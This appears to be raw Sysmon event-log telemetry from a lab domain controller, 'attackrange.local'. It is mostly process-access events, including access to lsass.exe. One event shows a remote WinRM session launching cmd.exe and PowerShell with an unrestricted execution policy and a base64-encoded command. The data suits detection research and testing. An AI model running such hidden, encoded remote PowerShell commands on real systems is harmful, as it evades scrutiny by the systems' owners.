15:52:12.726{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003506Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7CAC-5FA1-AB00-000000008801}42364252C:\Windows\system32\conhost.exe{D28789B6-7CAC-5FA1-AC00-000000008801}5012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003505Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003504Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003503Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003502Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003501Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003500Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003499Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003498Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003497Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003496Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CAC-5FA1-AC00-000000008801}5012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003495Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7CAC-5FA1-AA00-000000008801}42403564C:\Windows\system32\WinrsHost.exe{D28789B6-7CAC-5FA1-AC00-000000008801}5012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x80000000000000003494Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.730{D28789B6-7CAC-5FA1-AC00-000000008801}5012C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CAC-5FA1-2CE6-060000000000}0x6e62c0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CAC-5FA1-AA00-000000008801}4240C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000003493Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003492Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003491Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003490Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.710{D28789B6-7C64-5FA1-1500-000000008801}13361488C:\Windows\system32\svchost.exe{D28789B6-7CAC-5FA1-AA00-000000008801}4240C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003489Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.710{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CAC-5FA1-AA00-000000008801}4240C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003488Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.694{D28789B6-7CAC-5FA1-AB00-000000008801}42364252C:\Windows\system32\conhost.exe{D28789B6-7CAC-5FA1-AA00-000000008801}4240C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003487Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.694{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CAC-5FA1-AB00-000000008801}4236C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003486Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.694{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003485Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 